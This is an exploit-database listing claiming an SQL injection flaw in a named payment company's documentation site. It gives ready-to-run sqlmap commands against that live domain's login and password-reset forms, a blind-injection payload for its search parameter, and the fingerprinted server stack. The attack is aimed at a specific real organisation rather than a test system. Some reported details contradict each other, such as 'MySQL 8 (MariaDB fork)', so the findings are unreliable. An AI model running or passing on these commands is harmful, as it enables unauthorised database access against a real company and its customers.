Worldnet Payments Knowledge Base : Start | SQL Injection Vulnerability

2021.10.09
tr 0x01369 (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Worldnet Payments Knowledge Base : Start | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "https://docs.worldnettps.com/doku.php?do=login" --forms --dbs --batch # sqlmap -u "https://docs.worldnettps.com/doku.php?id=start&do=resendpwd" --forms --dbs --batch --------------------------------------------------------------------------------------------------- .com commercial Worldnet Payments Knowledge Base : Start https://docs.worldnettps.com/doku.php?do=login https://docs.worldnettps.com/doku.php?id=start&do=resendpwd --- Parameter: q (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: do=search&id=start&q=kJJJ AND 3044=3044 Vector: AND [INFERENCE] --- the back-end DBMS is MySQL web server operating system: Linux Ubuntu 18.04 (bionic) web application technology: Apache 2.4.29 back-end DBMS: MySQL 8 (MariaDB fork)

References:

0x01369


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top